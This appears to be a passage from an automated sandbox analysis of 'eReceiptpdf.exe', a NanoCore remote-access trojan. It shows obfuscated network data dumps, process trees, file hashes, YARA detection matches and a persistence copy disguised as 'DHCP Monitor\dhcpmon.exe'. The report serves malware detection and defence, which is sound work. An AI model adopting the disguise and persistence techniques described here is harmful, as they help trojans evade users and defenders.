qcj qj qqj qw qhI qjx qwq wq we pj qxc qhx qep eq ec e ejp wq cq ehp qcw qIw Ic qwe jp qOp qOI Ox eqp qqj qxp jq qOe Oe eeq
2021-10-27 01:03:26 UTC	1654	IN	Data Raw: 6a 20 77 78 20 70 6a 20 63 68 20 71 70 65 20 71 49 65 20 6a 71 20 65 65 71 20 71 71 49 20 49 49 20 49 77 20 6a 49 20 70 77 20 71 71 71 20 65 71 63 20 77 77 20 71 49 20 71 63 65 20 65 49 20 71 68 71 20 71 68 20 63 6a 20 71 68 78 20 71 49 4f 20 71 6a 63 20 71 70 65 20 78 65 20 77 71 20 71 65 20 71 78 78 20 71 78 49 20 4f 71 20 65 63 20 77 78 20 71 70 20 65 68 63 20 70 70 20 71 49 78 20 77 65 20 71 68 68 20 65 65 20 78 68 20 65 6a 63 20 70 49 20 71 4f 49 20 71 70 71 20 71 63 4f 20 63 63 20 65 6a 68 20 71 65 6a 20 65 6a 20 65 65 71 20 71 6a 63 20 70 68 20 71 68 49 20 77 77 20 71 70 77 20 71 6a 49 20 65 63 63 20 65 65 63 20 71 49 49 20 65 6a 78 20 71 65 6a 20 71 78 68 20 65 65 6a 20 63 77 20 65 78 68 20 71 63 78 20 65 6a 77 20 65 20 71 6a 70 20 65 78 70 20 71 Data Ascii: j wx pj ch qpe qIe jq eeq qqI II Iw jI pw qqq eqc ww qI qce eI qhq qh cj qhx qIO qjc qpe xe wq qe qxx qxI Oq ec wx qp ehc pp qIx we qhh ee xh ejc pI qOI qpq qcO cc ejh qej ej eeq qjc ph qhI ww qpw qjI ecc eec qII ejx qej qxh eej cw exh qcx ejw e qjp exp q
2021-10-27 01:03:26 UTC	1670	IN	Data Raw: 70 78 20 4f 68 20 71 71 77 20 71 68 63 20 71 71 65 20 63 71 20 78 70 20 71 71 6a 20 63 78 20 63 4f 20 71 71 78 20 65 78 20 71 68 4f 20 68 20 63 68 20 70 71 20 63 68 20 70 70 20 70 78 20 71 71 20 71 71 77 20 6a 63 20 71 71 65 20 70 6a 20 78 70 20 4f 63 20 63 78 20 78 4f 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 68 20 71 68 65 20 63 68 20 70 63 20 70 78 20 63 70 20 71 71 77 20 71 68 4f 20 71 71 65 20 71 68 20 78 70 20 63 70 20 63 78 20 70 63 20 71 71 78 20 63 71 20 71 68 4f 20 65 63 20 63 68 20 4f 65 20 63 68 20 70 6a 20 70 78 20 63 78 20 71 71 77 20 70 20 71 71 65 20 49 63 20 78 70 20 70 71 20 63 78 20 6a 70 20 71 71 78 20 65 70 20 71 68 4f 20 68 20 63 68 20 49 70 20 63 68 20 4f 63 20 70 78 20 65 4f 20 71 71 77 20 6a 20 71 71 65 20 63 68 20 78 Data Ascii: px Oh qqw qhc qqe cq xp qqj cx cO qqx ex qhO h ch pq ch pp px qq qqw jc qqe pj xp Oc cx xO qqx qqw qhO qqe ch qhe ch pc px cp qqw qhO qqe qh xp cp cx pc qqx cq qhO ec ch Oe ch pj px cx qqw p qqe Ic xp pq cx jp qqx ep qhO h ch Ip ch Oc px eO qqw j qqe ch x
2021-10-27 01:03:26 UTC	1686	IN	Data Raw: 20 4f 20 68 20 68 20 68 20 6a 71 20 63 65 20 71 63 77 20 6a 77 20 6a 65 20 4f 20 68 20 68 20 68 20 6a 71 20 63 65 20 71 63 77 20 6a 77 20 6a 71 20 4f 20 6a 71 20 49 77 20 71 63 77 20 6a 77 20 6a 65 20 70 20 68 20 68 20 68 20 6a 71 20 63 49 20 71 63 77 20 6a 77 20 6a 65 20 70 20 68 20 68 20 68 20 6a 71 20 63 77 20 71 63 77 20 6a 77 20 6a 68 20 6a 71 20 71 68 68 20 71 63 77 20 6a 77 20 6a 65 20 77 20 68 20 68 20 68 20 6a 71 20 63 65 20 71 63 77 20 6a 77 20 6a 65 20 77 20 68 20 68 20 68 20 6a 71 20 71 68 68 20 71 63 77 20 6a 77 20 65 4f 20 6a 71 20 4f 77 20 71 63 77 20 6a 77 20 6a 65 20 49 20 68 20 68 20 68 20 6a 71 20 78 70 20 71 63 77 20 6a 77 20 6a 65 20 49 20 68 20 68 20 68 20 6a 71 20 63 49 20 71 63 77 20 6a 77 20 65 70 20 6a 71 20 71 68 71 20 71 63 77 Data Ascii: O h h h jq ce qcw jw je O h h h jq ce qcw jw jq O jq Iw qcw jw je p h h h jq cI qcw jw je p h h h jq cw qcw jw jh jq qhh qcw jw je w h h h jq ce qcw jw je w h h h jq qhh qcw jw eO jq Ow qcw jw je I h h h jq xp qcw jw je I h h h jq cI qcw jw ep jq qhq qcw
2021-10-27 01:03:26 UTC	1702	IN	Data Raw: 63 20 4f 20 65 78 65 20 71 71 20 71 78 20 68 20 6a 6a 20 65 20 71 68 78 20 71 68 20 71 78 20 68 20 71 63 77 20 77 20 71 68 78 20 71 68 20 71 68 20 68 20 70 20 78 20 65 78 65 20 71 71 20 71 68 20 68 20 65 20 6a 20 63 70 20 77 20 71 68 20 68 20 78 70 20 71 68 20 65 71 20 77 20 71 78 20 68 20 65 65 4f 20 77 20 65 71 78 20 49 20 71 68 20 68 20 71 70 49 20 49 20 65 71 20 77 20 71 68 20 68 20 63 68 20 4f 20 71 49 68 20 49 20 71 68 20 68 20 65 68 4f 20 6a 20 71 49 68 20 49 20 71 68 20 68 20 71 65 70 20 65 20 65 71 20 77 20 71 68 20 68 20 71 63 49 20 71 71 20 65 71 20 77 20 71 68 20 68 20 6a 77 20 4f 20 65 71 20 77 20 71 68 20 68 20 71 71 77 20 65 20 65 71 20 77 20 71 68 20 68 20 65 70 20 4f 20 71 68 78 20 71 68 20 71 70 20 68 20 6a 4f 20 68 20 71 70 71 20 77 20 Data Ascii: c O exe qq qx h jj e qhx qh qx h qcw w qhx qh qh h p x exe qq qh h e j cp w qh h xp qh eq w qx h eeO w eqx I qh h qpI I eq w qh h ch O qIh I qh h ehO j qIh I qh h qep e eq w qh h qcI qq eq w qh h jw O eq w qh h qqw e eq w qh h ep O qhx qh qp h jO h qpq w
2021-10-27 01:03:26 UTC	1718	IN	Data Raw: 68 20 71 65 65 20 6a 20 68 20 68 20 68 20 65 65 20 68 20 71 78 49 20 71 65 6a 20 65 77 20 71 20 78 63 20 68 20 71 68 78 20 71 65 6a 20 6a 20 68 20 68 20 68 20 65 65 20 68 20 63 68 20 71 68 49 20 65 77 20 71 20 78 63 20 68 20 65 78 70 20 71 65 78 20 6a 20 68 20 68 20 68 20 65 65 20 68 20 71 65 65 20 6a 77 20 65 77 20 71 20 78 63 20 68 20 68 20 71 65 77 20 6a 20 68 20 68 20 68 20 65 65 20 68 20 71 78 68 20 71 6a 70 20 65 77 20 71 20 78 63 20 68 20 71 49 70 20 71 65 70 20 6a 20 68 20 68 20 68 20 65 65 20 68 20 77 70 20 77 49 20 65 77 20 71 20 78 63 20 68 20 71 63 65 20 71 6a 68 20 6a 20 68 20 68 20 68 20 65 65 20 68 20 71 63 65 20 70 65 20 65 77 20 71 20 78 63 20 68 20 70 70 20 71 6a 65 20 6a 20 68 20 68 20 68 20 65 65 20 68 20 78 65 20 71 65 77 20 65 77 20 Data Ascii: h qee j h h h ee h qxI qej ew q xc h qhx qej j h h h ee h ch qhI ew q xc h exp qex j h h h ee h qee jw ew q xc h h qew j h h h ee h qxh qjp ew q xc h qIp qep j h h h ee h wp wI ew q xc h qce qjh j h h h ee h qce pe ew q xc h pp qje j h h h ee h xe qew ew
2021-10-27 01:03:26 UTC	1734	IN	Data Raw: 68 20 70 20 68 20 70 68 20 71 68 20 78 65 20 71 68 20 70 20 68 20 70 78 20 71 68 20 78 77 20 71 68 20 70 20 68 20 70 70 20 71 68 20 49 65 20 71 68 20 70 20 68 20 4f 65 20 71 68 20 77 77 20 71 68 20 70 20 68 20 4f 49 20 71 68 20 70 65 20 71 68 20 78 71 20 68 20 63 71 20 68 20 65 68 71 20 71 65 20 49 78 20 68 20 65 77 20 68 20 65 65 77 20 71 20 49 78 20 68 20 71 4f 20 68 20 71 4f 65 20 71 65 20 49 77 20 68 20 71 71 20 68 20 71 49 71 20 71 65 20 49 77 20 68 20 71 4f 20 68 20 71 4f 65 20 71 65 20 77 6a 20 68 20 63 71 20 68 20 65 71 70 20 71 65 20 4f 4f 20 68 20 71 71 20 68 20 71 49 71 20 71 65 20 4f 4f 20 68 20 71 4f 20 68 20 71 4f 65 20 71 65 20 71 68 63 20 68 20 63 71 20 68 20 65 6a 70 20 71 65 20 71 65 70 20 68 20 65 77 20 68 20 65 65 77 20 71 20 71 6a 71 Data Ascii: h p h ph qh xe qh p h px qh xw qh p h pp qh Ie qh p h Oe qh ww qh p h OI qh pe qh xq h cq h ehq qe Ix h ew h eew q Ix h qO h qOe qe Iw h qq h qIq qe Iw h qO h qOe qe wj h cq h eqp qe OO h qq h qIq qe OO h qO h qOe qe qhc h cq h ejp qe qep h ew h eew q qjq
2021-10-27 01:03:26 UTC	1750	IN	Data Raw: 20 68 20 70 6a 20 71 68 71 20 71 71 49 20 77 63 20 71 68 71 20 71 71 78 20 71 71 68 20 71 68 71 20 71 68 70 20 77 4f 20 4f 70 20 71 68 49 20 71 68 71 20 4f 4f 20 71 71 49 20 70 6a 20 71 68 71 20 4f 4f 20 71 71 77 20 71 71 78 20 71 68 63 20 71 71 49 20 71 65 71 20 68 20 77 6a 20 49 4f 20 71 71 68 20 71 71 49 20 71 68 63 20 71 71 49 20 71 65 71 20 68 20 49 4f 20 71 68 4f 20 71 71 65 20 71 71 49 20 71 65 71 20 68 20 65 6a 49 20 71 6a 71 20 71 63 77 20 65 6a 49 20 71 6a 68 20 71 70 70 20 65 6a 49 20 71 6a 71 20 71 49 78 20 65 6a 49 20 71 6a 71 20 71 49 6a 20 65 6a 49 20 71 6a 71 20 71 70 65 20 65 6a 49 20 71 6a 71 20 71 65 70 20 65 6a 49 20 71 6a 71 20 71 65 4f 20 65 6a 49 20 71 6a 71 20 71 77 65 20 65 6a 49 20 71 6a 71 20 71 70 77 20 65 6a 49 20 71 6a 71 20 Data Ascii: h pj qhq qqI wc qhq qqx qqh qhq qhp wO Op qhI qhq OO qqI pj qhq OO qqw qqx qhc qqI qeq h wj IO qqh qqI qhc qqI qeq h IO qhO qqe qqI qeq h ejI qjq qcw ejI qjh qpp ejI qjq qIx ejI qjq qIj ejI qjq qpe ejI qjq qep ejI qjq qeO ejI qjq qwe ejI qjq qpw ejI qjq
2021-10-27 01:03:26 UTC	1766	IN	Data Raw: 70 78 20 65 65 71 20 71 49 78 20 65 65 65 20 71 6a 63 20 68 20 65 6a 65 20 71 6a 63 20 71 78 78 20 65 6a 65 20 71 6a 78 20 71 70 78 20 65 6a 65 20 71 6a 78 20 71 6a 70 20 65 6a 65 20 71 6a 78 20 71 6a 4f 20 65 6a 65 20 71 6a 78 20 71 70 49 20 65 6a 65 20 71 6a 78 20 71 6a 63 20 65 6a 65 20 71 6a 78 20 71 70 63 20 65 6a 65 20 71 6a 78 20 71 78 71 20 65 6a 65 20 71 6a 78 20 71 63 70 20 65 6a 65 20 71 6a 78 20 71 70 70 20 65 6a 65 20 71 6a 78 20 71 6a 49 20 65 6a 65 20 71 6a 78 20 71 70 77 20 65 6a 65 20 71 6a 78 20 71 78 6a 20 65 6a 65 20 71 6a 78 20 71 6a 4f 20 65 6a 65 20 71 6a 63 20 71 6a 49 20 68 20 65 65 4f 20 71 78 78 20 71 49 63 20 65 65 4f 20 71 78 78 20 71 6a 77 20 65 65 4f 20 71 78 78 20 71 78 49 20 65 65 4f 20 71 78 78 20 71 70 65 20 65 65 4f 20 Data Ascii: px eeq qIx eee qjc h eje qjc qxx eje qjx qpx eje qjx qjp eje qjx qjO eje qjx qpI eje qjx qjc eje qjx qpc eje qjx qxq eje qjx qcp eje qjx qpp eje qjx qjI eje qjx qpw eje qjx qxj eje qjx qjO eje qjc qjI h eeO qxx qIc eeO qxx qjw eeO qxx qxI eeO qxx qpe eeO
2021-10-27 01:03:26 UTC	1782	IN	Data Raw: 20 71 63 70 20 65 6a 65 20 71 78 49 20 71 49 6a 20 65 6a 65 20 71 78 49 20 71 78 6a 20 65 6a 65 20 71 78 49 20 71 63 77 20 65 6a 65 20 71 78 49 20 71 63 77 20 65 6a 65 20 71 78 49 20 71 6a 78 20 65 6a 65 20 71 78 49 20 71 78 65 20 68 20 65 6a 71 20 71 78 77 20 71 78 63 20 65 6a 71 20 71 78 49 20 71 6a 4f 20 65 6a 71 20 71 78 49 20 71 78 68 20 65 6a 71 20 71 78 49 20 71 63 63 20 65 6a 71 20 71 78 49 20 71 4f 71 20 65 6a 71 20 71 78 49 20 71 70 63 20 65 6a 71 20 71 78 49 20 71 78 78 20 65 6a 71 20 71 78 49 20 71 77 6a 20 65 6a 71 20 71 78 49 20 71 78 63 20 65 6a 71 20 71 78 49 20 71 6a 4f 20 65 6a 71 20 71 78 49 20 71 70 77 20 65 6a 71 20 71 78 49 20 71 70 70 20 65 6a 71 20 71 78 49 20 71 77 71 20 65 6a 71 20 71 78 49 20 71 6a 77 20 65 6a 71 20 71 78 77 20 Data Ascii: qcp eje qxI qIj eje qxI qxj eje qxI qcw eje qxI qcw eje qxI qjx eje qxI qxe h ejq qxw qxc ejq qxI qjO ejq qxI qxh ejq qxI qcc ejq qxI qOq ejq qxI qpc ejq qxI qxx ejq qxI qwj ejq qxI qxc ejq qxI qjO ejq qxI qpw ejq qxI qpp ejq qxI qwq ejq qxI qjw ejq qxw
2021-10-27 01:03:26 UTC	1798	IN	Data Raw: 20 71 70 65 20 65 65 63 20 71 6a 6a 20 71 6a 65 20 65 65 63 20 71 6a 6a 20 71 6a 70 20 65 65 63 20 71 6a 6a 20 71 6a 49 20 65 65 63 20 71 6a 6a 20 71 70 4f 20 65 65 63 20 71 6a 6a 20 71 70 6a 20 65 65 63 20 71 6a 6a 20 71 6a 70 20 65 65 63 20 71 6a 6a 20 71 63 78 20 65 65 63 20 71 6a 6a 20 71 6a 49 20 65 65 63 20 71 6a 6a 20 71 6a 65 20 65 65 63 20 71 6a 6a 20 71 6a 6a 20 65 65 63 20 71 6a 6a 20 71 78 4f 20 68 20 65 65 4f 20 71 6a 77 20 71 70 6a 20 65 65 4f 20 71 6a 77 20 71 49 49 20 65 65 4f 20 71 6a 70 20 71 78 4f 20 65 65 4f 20 71 6a 70 20 71 78 4f 20 65 65 4f 20 71 6a 77 20 71 49 65 20 65 65 4f 20 71 6a 77 20 71 70 77 20 65 65 4f 20 71 6a 70 20 71 49 4f 20 65 65 4f 20 71 6a 77 20 71 49 77 20 65 65 4f 20 71 6a 77 20 71 49 63 20 65 65 4f 20 71 6a 77 20 Data Ascii: qpe eec qjj qje eec qjj qjp eec qjj qjI eec qjj qpO eec qjj qpj eec qjj qjp eec qjj qcx eec qjj qjI eec qjj qje eec qjj qjj eec qjj qxO h eeO qjw qpj eeO qjw qII eeO qjp qxO eeO qjp qxO eeO qjw qIe eeO qjw qpw eeO qjp qIO eeO qjw qIw eeO qjw qIc eeO qjw
2021-10-27 01:03:26 UTC	1814	IN	Data Raw: 20 71 70 68 20 65 6a 77 20 71 63 63 20 71 63 63 20 65 6a 77 20 71 63 63 20 71 63 70 20 65 6a 77 20 71 63 49 20 71 78 68 20 65 6a 77 20 71 63 49 20 71 6a 77 20 65 6a 77 20 71 63 49 20 71 63 65 20 65 6a 77 20 71 63 63 20 71 63 49 20 65 6a 77 20 71 63 49 20 71 6a 70 20 65 6a 77 20 71 63 63 20 71 49 71 20 65 6a 77 20 71 63 63 20 71 63 4f 20 65 6a 77 20 71 63 49 20 71 6a 4f 20 65 6a 77 20 71 63 63 20 71 63 49 20 68 20 65 6a 6a 20 71 49 65 20 71 49 71 20 65 6a 6a 20 71 49 71 20 71 49 70 20 65 6a 6a 20 71 49 65 20 71 63 65 20 65 6a 6a 20 71 49 65 20 71 63 6a 20 65 6a 6a 20 71 49 71 20 71 49 4f 20 65 6a 6a 20 71 49 71 20 71 77 71 20 65 6a 6a 20 71 49 65 20 71 63 49 20 65 6a 6a 20 71 49 71 20 71 49 49 20 65 6a 6a 20 71 49 65 20 71 63 6a 20 65 6a 6a 20 71 49 71 20 Data Ascii: qph ejw qcc qcc ejw qcc qcp ejw qcI qxh ejw qcI qjw ejw qcI qce ejw qcc qcI ejw qcI qjp ejw qcc qIq ejw qcc qcO ejw qcI qjO ejw qcc qcI h ejj qIe qIq ejj qIq qIp ejj qIe qce ejj qIe qcj ejj qIq qIO ejj qIq qwq ejj qIe qcI ejj qIq qII ejj qIe qcj ejj qIq
2021-10-27 01:03:26 UTC	1830	IN	Data Raw: 20 65 6a 65 20 71 77 49 20 71 49 6a 20 68 20 65 65 49 20 71 77 4f 20 71 78 71 20 65 65 49 20 71 77 4f 20 71 78 71 20 65 65 49 20 71 77 70 20 71 70 71 20 65 65 49 20 71 77 70 20 71 49 68 20 65 65 49 20 71 77 70 20 71 49 71 20 65 65 49 20 71 77 70 20 71 70 63 20 65 65 49 20 71 77 4f 20 71 78 78 20 65 65 49 20 71 77 4f 20 71 49 78 20 65 65 49 20 71 77 4f 20 71 78 6a 20 65 65 49 20 71 77 70 20 71 49 68 20 65 65 49 20 71 77 70 20 71 63 49 20 65 65 49 20 71 77 70 20 71 49 68 20 65 65 49 20 71 77 4f 20 71 63 4f 20 65 65 49 20 71 77 70 20 71 63 49 20 65 65 49 20 71 77 70 20 71 49 6a 20 68 20 65 65 49 20 71 70 6a 20 71 49 68 20 65 65 49 20 71 70 65 20 71 70 68 20 65 65 49 20 71 70 65 20 71 77 77 20 65 65 49 20 71 70 65 20 71 77 4f 20 65 65 49 20 71 70 6a 20 71 78 Data Ascii: eje qwI qIj h eeI qwO qxq eeI qwO qxq eeI qwp qpq eeI qwp qIh eeI qwp qIq eeI qwp qpc eeI qwO qxx eeI qwO qIx eeI qwO qxj eeI qwp qIh eeI qwp qcI eeI qwp qIh eeI qwO qcO eeI qwp qcI eeI qwp qIj h eeI qpj qIh eeI qpe qph eeI qpe qww eeI qpe qwO eeI qpj qx
2021-10-27 01:03:26 UTC	1846	IN	Data Raw: 65 63 20 71 70 49 20 71 77 65 20 65 65 63 20 71 70 49 20 71 70 65 20 65 65 63 20 71 70 49 20 71 6a 77 20 65 65 63 20 71 70 77 20 71 6a 78 20 65 65 63 20 71 70 49 20 71 70 71 20 65 65 63 20 71 70 49 20 71 77 4f 20 65 65 63 20 71 70 49 20 71 6a 6a 20 65 65 63 20 71 70 49 20 71 70 71 20 65 65 63 20 71 70 49 20 71 6a 65 20 65 65 63 20 71 70 49 20 71 6a 6a 20 65 65 63 20 71 70 49 20 71 77 71 20 68 20 65 6a 70 20 71 4f 71 20 71 77 63 20 65 6a 70 20 71 4f 71 20 71 63 49 20 65 6a 70 20 71 4f 68 20 71 77 6a 20 65 6a 70 20 71 4f 68 20 71 77 4f 20 65 6a 70 20 71 4f 71 20 71 78 63 20 65 6a 70 20 71 4f 71 20 71 63 4f 20 65 6a 70 20 71 4f 68 20 71 77 70 20 65 6a 70 20 71 4f 68 20 71 77 6a 20 65 6a 70 20 71 4f 71 20 71 63 63 20 65 6a 70 20 71 4f 71 20 71 63 70 20 65 6a Data Ascii: ec qpI qwe eec qpI qpe eec qpI qjw eec qpw qjx eec qpI qpq eec qpI qwO eec qpI qjj eec qpI qpq eec qpI qje eec qpI qjj eec qpI qwq h ejp qOq qwc ejp qOq qcI ejp qOh qwj ejp qOh qwO ejp qOq qxc ejp qOq qcO ejp qOh qwp ejp qOh qwj ejp qOq qcc ejp qOq qcp ej
2021-10-27 01:03:26 UTC	1862	IN	Data Raw: 20 71 77 6a 20 71 78 71 20 65 65 70 20 71 77 6a 20 71 6a 71 20 65 65 70 20 71 77 65 20 71 70 68 20 65 65 70 20 71 77 6a 20 71 49 78 20 65 65 70 20 71 77 65 20 71 70 78 20 65 65 70 20 71 77 6a 20 71 49 49 20 65 65 70 20 71 77 65 20 71 70 49 20 65 65 70 20 71 77 65 20 71 77 77 20 65 65 70 20 71 77 65 20 71 70 6a 20 65 65 70 20 71 77 65 20 71 70 6a 20 65 65 70 20 71 77 65 20 71 77 70 20 68 20 65 6a 4f 20 71 77 65 20 71 6a 77 20 65 6a 4f 20 71 77 65 20 71 70 71 20 65 6a 4f 20 71 77 65 20 71 77 77 20 65 6a 4f 20 71 77 65 20 71 78 4f 20 65 6a 4f 20 71 77 65 20 71 49 78 20 65 6a 4f 20 71 77 65 20 71 70 70 20 65 6a 4f 20 71 77 65 20 71 77 77 20 65 6a 4f 20 71 77 65 20 71 6a 68 20 65 6a 4f 20 71 77 65 20 71 6a 78 20 65 6a 4f 20 71 77 65 20 71 63 78 20 65 6a 4f 20 Data Ascii: qwj qxq eep qwj qjq eep qwe qph eep qwj qIx eep qwe qpx eep qwj qII eep qwe qpI eep qwe qww eep qwe qpj eep qwe qpj eep qwe qwp h ejO qwe qjw ejO qwe qpq ejO qwe qww ejO qwe qxO ejO qwe qIx ejO qwe qpp ejO qwe qww ejO qwe qjh ejO qwe qjx ejO qwe qcx ejO
2021-10-27 01:03:26 UTC	1878	IN	Data Raw: 78 4f 20 65 71 71 20 71 49 68 20 65 71 71 20 71 78 77 20 65 71 68 20 71 49 4f 20 65 71 68 20 71 4f 68 20 65 71 71 20 71 49 70 20 65 71 68 20 71 49 6a 20 65 71 71 20 71 78 70 20 65 71 68 20 71 70 63 20 68 20 65 65 70 20 71 78 78 20 71 70 4f 20 65 65 70 20 71 78 78 20 71 70 78 20 65 65 70 20 71 78 63 20 71 63 77 20 65 65 70 20 71 78 78 20 71 70 70 20 65 65 70 20 71 78 78 20 71 70 63 20 65 65 70 20 71 78 78 20 71 70 63 20 65 65 70 20 71 78 63 20 71 63 68 20 65 65 70 20 71 78 78 20 71 70 63 20 65 65 70 20 71 78 63 20 71 63 71 20 65 65 70 20 71 78 78 20 71 70 78 20 65 65 70 20 71 78 63 20 71 49 49 20 65 65 70 20 71 78 78 20 71 70 68 20 65 65 70 20 71 78 78 20 71 70 49 20 65 65 70 20 71 78 63 20 71 49 49 20 65 65 70 20 71 78 78 20 71 70 49 20 68 20 65 6a 63 20 Data Ascii: xO eqq qIh eqq qxw eqh qIO eqh qOh eqq qIp eqh qIj eqq qxp eqh qpc h eep qxx qpO eep qxx qpx eep qxc qcw eep qxx qpp eep qxx qpc eep qxx qpc eep qxc qch eep qxx qpc eep qxc qcq eep qxx qpx eep qxc qII eep qxx qph eep qxx qpI eep qxc qII eep qxx qpI h ejc
2021-10-27 01:03:26 UTC	1894	IN	Data Raw: 20 49 71 20 71 77 20 63 77 20 63 20 68 20 71 20 65 70 20 71 70 20 49 71 20 65 20 49 20 70 20 6a 20 49 20 71 77 20 77 65 20 78 20 68 20 68 20 71 20 68 20 78 20 68 20 68 20 70 20 68 20 78 20 65 63 63 20 71 63 20 71 63 20 68 20 78 20 71 65 70 20 68 20 68 20 68 20 78 20 65 20 68 20 68 20 68 20 78 20 49 78 20 68 20 68 20 68 20 78 20 68 20 78 20 68 20 68 20 78 20 68 20 71 49 20 68 20 68 20 78 20 68 20 65 20 68 20 68 20 78 20 68 20 71 20 68 20 68 20 78 20 68 20 70 20 68 20 68 20 78 20 71 20 68 20 68 20 68 20 78 20 70 20 68 20 68 20 68 20 78 20 71 49 20 68 20 68 20 68 20 78 20 6a 65 20 68 20 68 20 68 20 78 20 68 20 68 20 65 20 68 20 78 20 68 20 68 20 71 63 20 68 20 78 20 68 20 68 20 78 20 68 20 65 20 49 20 4f 20 6a 20 49 20 71 77 20 77 49 20 78 20 68 20 68 20 68 Data Ascii: Iq qw cw c h q ep qp Iq e I p j I qw we x h h q h x h h p h x ecc qc qc h x qep h h h x e h h h x Ix h h h x h x h h x h qI h h x h e h h x h q h h x h p h h x q h h h x p h h h x qI h h h x je h h h x h h e h x h h qc h x h h x h e I O j I qw wI x h h h

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: eReceiptpdf.exe PID: 7124 Parent PID: 5760

General

Start time:	03:03:03
Start date:	27/10/2021
Path:	C:\Users\user\Desktop\eReceiptpdf.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\eReceiptpdf.exe'
Imagebase:	0xdc0000
File size:	182200 bytes
MD5 hash:	C97F7F2DEA671626AB1C6D3D1AD59422
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000000.310947672.0000000005144000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000000.310947672.0000000005144000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000000.00000000.310947672.0000000005144000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000000.300635347.0000000005144000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000000.300635347.0000000005144000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000000.00000000.300635347.0000000005144000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000000.324519764.00000000070F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000000.324519764.00000000070F1000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000000.00000000.324519764.00000000070F1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000000.303431509.00000000070F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000000.303431509.00000000070F1000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000000.00000000.303431509.00000000070F1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Chronological Activities

Analysis Process: eReceiptpdf.exe PID: 5784 Parent PID: 7124

General

Start time:	03:03:08
Start date:	27/10/2021
Path:	C:\Users\user\Desktop\eReceiptpdf.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\eReceiptpdf.exe
Imagebase:	0x810000
File size:	182200 bytes
MD5 hash:	C97F7F2DEA671626AB1C6D3D1AD59422
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	low

Chronological Activities

Analysis Process: WerFault.exe PID: 6360 Parent PID: 7124

General

Start time:	03:03:19
Start date:	27/10/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7124 -s 2176
Imagebase:	0x120000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: dhcpmon.exe PID: 6428 Parent PID: 3352

General

Start time:	03:03:19
Start date:	27/10/2021
Path:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
Imagebase:	0xb30000
File size:	182200 bytes
MD5 hash:	C97F7F2DEA671626AB1C6D3D1AD59422
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.346857175.0000000006FB1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.346857175.0000000006FB1000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.346857175.0000000006FB1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.341009071.0000000004F77000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.341009071.0000000004F77000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.341009071.0000000004F77000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Florian Roth
Antivirus matches:	Detection: 22%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: WerFault.exe PID: 7076 Parent PID: 7124

General

Start time:	03:03:25
Start date:	27/10/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7124 -s 2176
Imagebase:	0x120000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: dhcpmon.exe PID: 6564 Parent PID: 6428

